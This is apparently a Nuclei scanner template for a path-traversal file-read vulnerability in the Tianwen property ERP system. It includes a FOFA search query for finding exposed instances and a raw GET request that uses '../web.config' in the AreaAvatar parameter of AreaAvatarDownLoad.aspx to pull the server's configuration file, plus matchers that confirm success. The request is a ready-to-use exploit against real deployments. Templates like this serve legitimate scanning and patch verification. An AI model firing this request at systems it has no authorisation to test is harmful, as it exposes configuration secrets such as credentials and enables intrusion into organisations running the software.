id: tianwenERP-AreaAvatarDownLoad-Fileread

info:
  name: tianwenERP-AreaAvatarDownLoad-Fileread
  author: lengmo
  severity: high
  description: tianwenERP-AreaAvatarDownLoad-Fileread
  tags: fileread
  metadata:
    fofa-query: body="天问物业ERP系统" || body="国家版权局软著登字第1205328号" || body="/HM/M_Main/frame/sso.aspx"
    
http:
  - raw:
      - |
        GET /HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1
        Host: 
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<?xml version="1.0" encoding="UTF-8"?>'
      - type: status
        status: 
          - 200